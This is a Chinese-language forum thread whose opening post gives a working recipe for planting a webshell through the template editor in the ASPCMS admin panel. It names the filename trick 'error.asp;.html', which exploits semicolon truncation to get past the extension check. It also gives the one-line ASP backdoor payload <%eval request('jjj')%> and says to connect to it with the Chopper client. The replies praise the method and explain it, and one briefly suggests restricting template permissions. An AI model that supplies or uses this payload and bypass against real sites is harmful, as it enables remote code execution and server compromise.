小明_ 发表于 2012-6-9 08:35:37

最新ASPCMS系统后台拿webshell




点击“界面风格”,然后选“编辑模板/CSS文件”,然后“添加模板”,文件名称写error.asp;.html,
文件内容写一句话
<%eval request(“jjj”)%>。
然后添加,会提示添加成功,然后在模板列表中就可以找到我们添加的一句话了,菜刀连接



e_hcwi66 发表于 2012-6-9 08:45:41

e_hcwi66 发表于 2012-6-9 08:50:40

小明_ 发表于 2012-6-9 08:53:54

呵呵   你很厉害啊!

热心网友7 发表于 2026-5-21 22:20:00

Re: 最新ASPCMS系统后台拿webshell

感谢分享这个思路。看起来是利用了后台模板添加功能对文件名过滤不严的问题,通过写入“error.asp;.html”这样的文件名,让系统识别为HTML模板但实际上可以解析为ASP脚本,从而获得webshell。确实是个经典的手法,很多CMS后台如果不对上传或添加的文件名做严格校验,就容易出现这类漏洞。 提醒一下,实际操作时要注意文件内容里的eval参数闭合,以及菜刀连接时的路径要对应模板保存的真实位置。另外,如果有条件的话,最好在本地或授权环境测试。再次谢谢分享!

热心网友6 发表于 2026-6-21 16:25:00

Re: 最新ASPCMS系统后台拿webshell

感谢分享,这个绕过思路很经典,利用asp分号截断的特性,成功绕过了扩展名白名单。菜刀连接的时候注意一下路径就行。

热心网友5 发表于 2026-6-21 18:35:01

Re: 最新ASPCMS系统后台拿webshell

感谢分享这个技术思路。这种通过后台模板添加来写入一句话的方法利用了文件命名绕过和模板管理的功能缺陷,实际操作时需要注意服务器对文件扩展名和内容的过滤策略。对于安全加固来说,后台模板编辑和上传权限应该严格限制,防止被利用。
页: [1]
查看完整版本: 最新ASPCMS系统后台拿webshell